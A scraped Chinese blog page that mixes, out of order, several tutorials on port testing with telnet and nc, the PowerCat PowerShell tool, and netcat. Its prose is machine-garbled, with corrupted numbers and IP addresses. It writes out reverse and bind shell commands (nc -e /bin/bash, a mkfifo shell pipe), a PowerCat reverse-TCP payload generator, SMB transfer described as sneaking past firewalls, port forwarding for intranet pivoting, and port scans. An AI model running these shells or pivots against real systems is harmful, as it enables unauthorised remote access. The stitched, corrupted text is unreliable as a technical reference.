UDP端口的连通性,批量主机服务扫描之netcat

By admin in 美高梅手机版4858 on 2019年4月14日

TCP端口的连通性

格局壹:TCP协议是面向连接的,能够一向通过telnet命令连接

telent ip port 

➜  packages telnet 127.0.0.1 80
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.

方法二:使用nc(netcat)命令

nc -vz ip port 

➜  packages nc -vz 127.0.0.1 80
found 0 associations
found 1 connections:
     1: flags=82<CONNECTED,PREFERRED>
    outif lo0
    src 127.0.0.1 port 49594
    dst 127.0.0.1 port 80
    rank info not available
    TCP aux info available

Connection to 127.0.0.1 port 80 [tcp/http] succeeded!

➜  packages nc -zv 127.0.0.1 8080
nc: connectx to 127.0.0.1 port 8080 (tcp) failed: Connection refused

nc相关option:

        -u      UDP mode
        -v      Verbose
        -z      Zero-I/O mode [used for scanning]

Linux 下 TCP/UDP 端口测试及表达方式求证

在云服务器 ECS Linux
系统中,有时须求在系统中测试端口的连通性,以便确认系统的TCP、UDP协议栈是或不是可以不奇怪运维。本文对此开始展览简要表达。

PowerCat

与Netcat&Ncat合作使用的PowerShell TCP / IP瑞士联邦军刀

https://github.com/secabstraction/PowerCat

PowerCat 被打包为2个 PowerShell module
所以要导入模块才能使用功用:

# Import the functions via the psd1 file:
    Import-Module PowerCat.psd1

netcat又称为瑞士联邦军刀,是黑客和系统一管理理员常用的互联网工具,最初开发的目标是文件传输,后来迈入出不少强有力的机能,比如也可以完毕批量主机服务扫描。

UDP端口的连通性,批量主机服务扫描之netcat。UDP端口的连通性

UDP商业事务是无连接的,不须要握手建立连接,数据发送后,server端也不会再次来到确认新闻。

方法一:使用nc(netcat)命令

nc -uvz ip port

➜  packages nc -uvz 127.0.0.1 80
found 0 associations
found 1 connections:
     1: flags=82<CONNECTED,PREFERRED>
    outif (null)
    src 127.0.0.1 port 54152
    dst 127.0.0.1 port 80
    rank info not available

Connection to 127.0.0.1 port 80 [udp/http] succeeded!

总计:nc(netcat)是特意用来TCP/UDP连接和监听的下令,提出大家从来采纳nc。

TCP端口测试

选用 telnet 测试现有监听端口连通性

能够动用 Linux 自带的 telnet 工具来测试现有端口的连通性,测试命令为:

telnet <host> <port>
# host 是目标服务器 IP,port是待测试端口号

效益和参数

Start-PowerCat      # Starts a listener/server.

    -Mode           # Defaults to Tcp, can also specify Udp or Smb.
    -Port           # The port to listen on.
    -PipeName       # Name of pipe to listen on.

    -SslCn      # Common name for Ssl encrypting Tcp.
    -Relay          # Format: "<Mode>:<Port/PipeName>"
    -Execute        # Execute a console process or powershell.
    -SendFile       # Filepath of file to send.
    -ReceiveFile    # Filepath of file to be written.
    -Disconnect     # Disconnect after connecting.
    -KeepAlive      # Restart after disconnecting.
    -Timeout        # Timeout option. Default: 60 seconds

Connect-PowerCat    # Connects a client to a listener/server.

    -Mode           # Defaults to Tcp, can also specify Udp or Smb
    -RemoteIp       # IPv4 address of host to connect to.
    -Port           # The port to connect to.
    -PipeName       # Name of pipe to connect to.

    -SslCn      # Common name for Ssl encrypting Tcp.
    -Relay          # Format: "<Mode>:<IP>:<Port/PipeName>"
    -Execute        # Execute a console process or powershell.
    -SendFile       # Filepath of file to send.
    -ReceiveFile    # Filepath of file to be written.
    -Disconnect     # Disconnect after connecting.
    -Timeout        # Timeout option. Default: 60 seconds

事先介绍了另二个更常用的批量主机服务扫描工具:nmap。

示例:

能够如下指令测试 2二 端口的连通性:

telnet 127.0.0.1 22

若成功总是,会显得类似如下消息。分歧 Linux
系统环境下,展现也许截然差别,但常见若包涵 “Connected to …”
消息,则申明连接成功。

Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
SSH-2.0-OpenSSH_5.3

除此以外, Windows
环境下,成功总是后,会合世一个新窗口(有回显或无其它回显)。
假设老是战败,会体现类似如下音信:

C:\>telnet 127.0.0.1 1111
正在连接127.0.0.1...无法打开到主机的连接。 在端口 1111: 连接失败

主干连接

私下认可情状下,PowerCat使用TCP协议 并且 从控制台读取,写到控制台。

 # Basic Listener: 监听本机443端口
    Start-PowerCat -Port 443

    # Basic Client: 
    Connect-PowerCat -RemoteIp 10.1.1.1 -Port 443

netcat的装置也分外不难,直接yum安装:

创办新的监听端口测试

能够行使 python 自带的 Web
服务器用于一时半刻创办新的监听端口举行测试。用法如下:

python -m SimpleHTTPServer <所需端口号>

文件传输

参数为
-SendFile
-ReceiveFile

    # Send File: 
    Connect-PowerCat -RemoteIp 10.1.1.1 -Port 443 -SendFile C:\pathto\inputfile

    # Receive File:
    Start-PowerCat -Port 443 -ReceiveFile C:\pathto\outputfile

yum install nc

演示输出:

[root@centos]# python -m SimpleHTTPServer 123
Serving HTTP on 0.0.0.0 port 123 ...
说明:启动的 Web 服务是单线程的,以当前目录为根目录,一次只能接受一个请求,一般只用来测试。测试完成按 Ctr +C 终止进程即可。

Shells

PowerCat can be used to send and serve (Power)Shells using the -Execute
parameter.

 # Serve a shell:
    Start-PowerCat -Port 443 -Execute

    # Send a Shell:
    Connect-PowerCat -RemoteIp 10.1.1.1 -Port 443 -Execute

貌似不建议在生养条件设置nc,因为nc除了能够批量主机服务扫描外,还扶助端口代理、文件传输,不难导致安全隐患。

UDP端口测试

telnet 仅能用于 TCP 协议的端口测试,若要对UDP端口实行测试,可以行使 nc
程序。

使用如下指令确认系统内是不是曾经设置了 nc:

which nc

UDP and SMB

PowerCat supports more than sending data over TCP.
PowerCat匡助的商议:TCP、UDP、SMB

    # Send Data Over UDP:
    Start-PowerCat -Mode Udp -Port 8000

    # Send Data Over SMB (easily sneak past firewalls):
    Start-PowerCat -Mode Smb -PipeName PowerCat

netcat之批量主机服务扫描

以身作则输出:

[root@centos]# which nc
/usr/bin/nc

万1 nc 未被装置,根据操作系统的差别, 使用yum 或 apt-get
等工具实行安装,本文不再详述。

SSL

PowerCat即时生成X50玖注解,以提供TCP连接的SSL加密。
PowerCat generates X509 certificates on-the-fly to provide SSL
encryption of TCP connections.

    # Admin privileges are required to generate the self-signed certificate.

    # Serve an SSL-Encrypted (Power)Shell:
    Start-PowerCat -Mode Tcp -Port 80 -SslCn <Certificate Common Name> -Execute

    # Connect to an SSL encrypted Ncat listener:
    # Setup *nix with openssl & Ncat:
    # openssl req -X509 -newkey rsa:2048 -subj /CN=PowerCat -days 90 -keyout key.pem -out cert.pem
    # ncat -l -p 80 --ssl --ssl-cert cert.pem --ssl-key key.pem

    Connect-PowerCat -Mode Tcp -RemoteIp 10.1.1.1 -Port 80 -SslCn PowerCat 

应用如下指令测试对象服务器 UDP 端口的连通性:

Relays

Relays in PowerCat are similar to netcat relays, but you don’t have to
create a file or start a second process. You can also relay data between
connections of different protocols.

    # UDP Listener to TCP Client Relay:
    Start-PowerCat -Mode Udp -Port 8000 -Relay tcp:10.1.1.16:443

    # TCP Listener to UDP Client Relay:
    Start-PowerCat -Port 8000 -Relay udp:10.1.1.16:53

    # TCP Client to Client Relay
    Connect-PowerCat -RemoteIp 10.1.1.1 -Port 9000 -Relay tcp:10.1.1.16:443

    # TCP Listener to SMB Listener Relay
    New-PowerCat -Listener -Port 8000 -Relay smb:PowerCat

netcat在围观时常用的参数:

用法:

nc -vuz <目标服务器 IP> <待测试端口>

Generate Payloads

Payloads can be generated using the New-PowerCatPayload function.

    # Generate a reverse tcp payload that connects back to 10.1.1.15 port 443:
    New-PowerCatPayload -RemoteIp 10.1.1.15 -Port 443 -Execute 

    # Generate a tcp payload that listens on port 8000:
    New-PowerCatPayload -Listener -Port 8000 -Execute

-w 设置超时时间

演示输出:

[root@centos]# nc -vuz 192.168.0.1 25
Connection to 192.168.0.1 25 port [udp/smtp] succeeded!

若重回结果中蕴藏 “succeeded”
字样,则注脚相应的端口访问符合规律。假设无其余再次回到消息,则证实相应端口访问退步。

Misc Usage

PowerCat can also perform port-scans, start persistent listeners, or act
as a simple web server.

    # Basic TCP port scan:
    1..1024 | ForEach-Object { Connect-PowerCat -RemoteIp 10.1.1.10 -Port $_ -Timeout 1 -Verbose -Disconnect }

    # Basic UDP port scan:
    1..1024 | ForEach-Object { Connect-PowerCat -Mode Udp -RemoteIp 10.1.1.10 -Port $_ -Timeout 1 -Verbose }

    # Persistent listener:
    Start-PowerCat -Port 443 -Execute -KeepAlive

    # Simple Web Server:
    Start-PowerCat -Port 80 -SendFile index.html

-z 输入输出形式

参数表明:

-v    详细输出(用两个-v可得到更详细的内容)
-u    使用UDP传输协议
-z    让nc只扫描端口,不发送任何的数据 

Exiting

In most cases, the ESC key can be used to gracefully exit PowerCat.


-v 展现命令执行进程

netcat

nc
netcat是互联网工具中的瑞士联邦军刀,通过TCP和UDP在网络中读写多少。
由此与任何工具结合和重定向,你能够在剧本中以多种艺术利用它。
选用netcat命令所能完毕的事情令人好奇。

netcat所做的正是在两台总结机之间建立链接并重返四个数据流,在那之后所能做的事就看你的想像力了。
您能树立3个服务器,传输文件,与对象聊天,传输流媒体,用它当作任何协议的单独客户端。
动用格式:

nc [options…] hostname port
nc -l -p port [-s addr] [options…] [hostname] [port]

首要参数:

-4 IPv4模式

-6 IPv6模式

-b, –bluetooth蓝牙五.0方式(私下认可为L2CAP协议)

-e,–exec=CMD连接建立后执行命令

-l 监听入站连接

-n 钦定数字的IP地址,无法用hostname

-u UDP模式

-t TCP方式(默许形式)

-v 详细输出——用三个-v可取得更详细的内容

-w,–time=SECONDS连接建立后的延时

-z 扫描形式,不会发送任何数据

-T,–ttl=TTL自定义开端TTL

-z 将输入输出关掉——用于扫描时

-x,–transfer文件传输格局

-X ,–rev-transfer反向文件传输方式

-s,–address=ADDRESS本地源ip

常用命令:

端口扫描

端口扫描,发现主机开放的端口

nc -z -v -n 220.181.57.217 80-81
found 0 associations
found 1 connections:
     1: flags=82<CONNECTED,PREFERRED>
    outif en0
    src 192.168.1.170 port 55690
    dst 220.181.57.217 port 80
    rank info not available
    TCP aux info available

Connection to 220.181.57.217 port 80 [tcp/*] succeeded!

-v 详细输出
-n 不利用DNS反向查询IP地址的域名

可以运作在TCP恐怕UDP情势:默许是TCP -u参数钦定为UDP

# 对已经开放的端口,使用netcat(会先自动连接开放端口)抓取此端口的banner
nc -v 220.181.57.217 80

TCP协议

相互通讯

Server <-> Client

只可以二个人通讯:双方任何壹方发送内容,另一方得以看看。
两边任何1方Ctrl-c结束两次三番,则另一方也会自动断开。

# Server  (IP 192.168.1.170)
#在1567端口启动了一个tcp 服务器,所有的标准输出和输入会输出到该端口。输出和输入都在此shell中展示。

nc -l 1567

### Client
nc 192.168.1.170 1567

nc -v -z -w2 192.168.2.224 1-50

文件传输

美高梅手机版4858,Server -> Client

FTP,SCP,SMB等合计,都能传输文件。

nc也能够传输文件:
双面建立连接,一时传输内容,并保存为文件。

#Server    (IP 192.168.1.170)
#监听1567端口,任何Client成功连接该端口后,服务器端把README.md中的内容发送过去。
nc -l 1567 < README.md

#Client
#主动连接到服务器端口,当获取内容结束后,断开双方连接。
nc -n 192.168.1.170 1567 #在shell中显示该文件的内容
nc -n 192.168.1.170 1567 > README2222.md #重定向 保存到文件中

UDP协议

目录传输

使用压缩工具tar压缩后发送压缩包,即可发送多个文件,也许全体目录。

#Server     (IP 192.168.1.170)
# 打包(不压缩)指定目录,通过 - 输入控制台重定向(当前目录中不生成新文件),又通过管道命令传给:nc
tar -cvf - dir_name/ | nc -l 1567

#Client
# 连接到服务器的1567端口,通过管道命令传给:tar工具 解压 控制台重定向的输出- 得到目录。
nc -n 192.168.1.170 1567 | tar -xvf -

nc -v -z -w2 -u 192.168.2.224 1-50

端口转载

netcat 做简单的端口转载。

背景:
1九二.168.一.十1要求拜访1玖2.168.一.10二的八千端口
(目的主机防火墙差异意外界机器访问八千端口,只允许其余机器连接指标主机1玖二.16八.1.十贰的7000端口)

操作:
1玖二.16捌.一.拾1通过延续指标机192.16八.壹.10贰的七千端口
(指标机内九千 <-> 捌仟 转载成功)
就落到实处了1九2.16八.一.10一与目的机1玖2.16八.一.拾二的7000端口的通讯。

#Server     (IP 192.168.1.102)
#防火墙只允许8000端口通信
nc -l 8000

#在目标机192.168.1.102内 令 9000端口 作为 转发数据的端口
#实现了 8000 <-> 9000 的端口转发
cat /tmp/fifo | nc localhost 8000 | nc -l 9000 > /tmp/fifo

#Client
#在客户端192.168.1.101主动连接192.168.1.102的9000端口
#实际上客户端只连接服务器端的9000端口
nc -n 192.168.1.102 9000

端口转载可用以内网渗透:
Client不可能间接待上访问内网特定机器X,并打响得到了内网壹台机器N:
在跳板机N内做端口转发,N接受到外网的多寡,将其转会到内网目的机器X的特定端口。

以下,未有实行实际的测试。

netcat之文件传输

点名地址 – 客户端主动发起连接的地点

就算本机有多少个ip地址:
在netcat中央银行使-s选项钦赐与表面通信的ip地址。

#Server     (IP 192.168.1.102)
#服务器端正常监听
nc -u -l 1567 < file.txt

#Client     (IP 192.168.1.101)
#指定 客户端本机 主动发起连接的ip地址 为192.168.1.101

nc -u 192.168.1.102 1567 -s 172.31.100.101 > file.txt

点名端口 – 客户端主动发起连接的端口

要是 客户端Client的防火墙,只允许二伍端口和外部通信:
据此需求发送发给外部的数码都要通过二伍端口 才能爆发

#Server     (IP 192.168.1.102)
#正常监听
nc -l 1567

#Client
#客户端Client的防火墙只允许25端口主动发出连接,和外部通讯
#-p 25 指定打开25端口,主动发出连接。否则打开任意端口进行通讯。
#root权限才能打开1024以内的端口

nc 192.168.1.170 1567 -p 25

netcat能够钦赐三个本地端口号开启监听形式,客户端能够采纳相同的netcat连接开启的端口发送消息,消息将在服务端显示出来。

长距离shell – 正向shell: A主动连到B A获得B的shell

Server 提供二个shell
Client 获得shell输入指令

假如未有设置或未有权力安装telnet或ssh
可用netcat创设远程shell

#Server     (IP 192.168.1.170)
#被控端

#netcat默认支持 -c -e 参数
#当有客户端连接成功时,执行/bin/bash
nc -l 1567 -e /bin/bash -i

#Server     (IP 192.168.1.170)
#被控端
#openBSD netcat (如Mac系统自带的nc):并不支持-c 或者 -e 参数,也能创建远程shell


mkfifo /tmp/tmp_fifo # 创建了一个fifo文件
cat /tmp/tmp_fifo | /bin/sh -i 2>&1 | nc -l 1567 > /tmp/tmp_fifo #使用管道命令把这个fifo文件内容定向到shell 2>&1中。
#是用来重定向标准错误输出和标准输出,然后管道到netcat运行的端口1567上。
#这样已经把netcat的输出重定向到fifo文件中。

说明:
从网络收到的输入写到fifo文件中
cat 命令读取fifo文件并且其剧情发送给sh命令
sh命令进程面临输入并把它写回到netcat。
netcat 通过互连网发送输出到client

能得逞是因为:管道任务令平行执行,fifo文件用来取代平常文件,因为fifo使读取等待而一旦是叁个常备文书,cat命令会尽快截止并开端读取空文件。

#Client
#主控端 直接连接 得到一个shell提示符在客户端
nc 192.168.1.170 1567

开启监听

长途shell – 反向shell: A主动连到B B获得A的shell

Server 提供多个shell
Client 获得shell输入指令

反向shell:在客户端打开的shell。
反向shell那样命名是因为不相同于别的安顿,那里服务器使用的是由客户提供的劳务。

服务端

#Server     (IP 192.168.1.170)
nc -l 1567

#Client
#客户端netcat主动连接,执行shell。
nc 172.31.100.7 1567 -e /bin/bash

反向shell作用:
反向shell平常被用来绕过防火墙的范围,如阻止入站连接。
诸如,某内网机器A 经过互连网地址转换(Network Address
Translation)连接到表面网络 机器B。

想要两台主机连接:
【成功】内网机器A 主动发起连接 能连接到表面机器B。

【战败】网络外部机器B 主动拜访 内网机器A 的shell肯定没戏。

nc -l 2389

传输(加密过的)数据

选取mcrypt工具,两端密码必须1致。

#Server     (IP 192.168.1.170)
# 使用mcrypt工具加密数据
$mcrypt –flush –bare -F -q -m ecb < file.txt | nc -l 1567

#Client
#使用mcrypt工具解密数据。
nc localhost 1567 | mcrypt –flush –bare -F -q -d -m ecb > file.txt

建立连接

传输流录制

即便不是生成流录像的最佳点子:

#Server     (IP 192.168.1.170)
#读入一个视频文件,重定向输出到netcat
cat video.avi | nc -l 1567

#Client
#从socket中读入数据并重定向到mplayer(需安装)
nc 192.168.1.170 1567 | mplayer -vo x11 -cache 3000 -

nc localhost 2389

克隆Linux

dd是一个从磁盘读取原始数据的工具,作者透过netcat服务珍视定向它的输出流到别的机器并且写入到磁盘中,它会趁着分区表拷贝全体的新闻。
而是即使大家已经做过分区并且只必要克隆root分区,大家得以依照我们系统root分区的岗位,更改sda
为sda1,sda2.之类。

#Server     (IP 192.168.1.170)
#假如你的系统在磁盘/dev/sda上
dd if=/dev/sda | nc -l 1567

#Client
nc -n 192.168.1.170 1567 | dd of=/dev/sda

如果将服务端的出口重定向到文件,就足以用来文件传输:

其它功用

利用-t选项模拟Telnet客户端
HTTP客户端用于下载文件
连天到邮件服务器,使用SMTP协议检查邮件
选取ffmpeg截取显示器并由此流式传输分享
只要询问商业事务,就能选择netcat作为互联网通信媒介,完结各个客户端。

nc -l 2389 > test

传输文件

cat testfile | nc localhost 2389

万一在壹台服务器上测试,能够利用&把nc切换来后台任务,在运行客户端的指令。

正文永久更新链接地址:http://www.linuxidc.com/Linux/2015-06/118601.htm

美高梅手机版4858 1

发表评论

电子邮件地址不会被公开。 必填项已用*标注

网站地图xml地图
Copyright @ 2010-2019 美高梅手机版4858 版权所有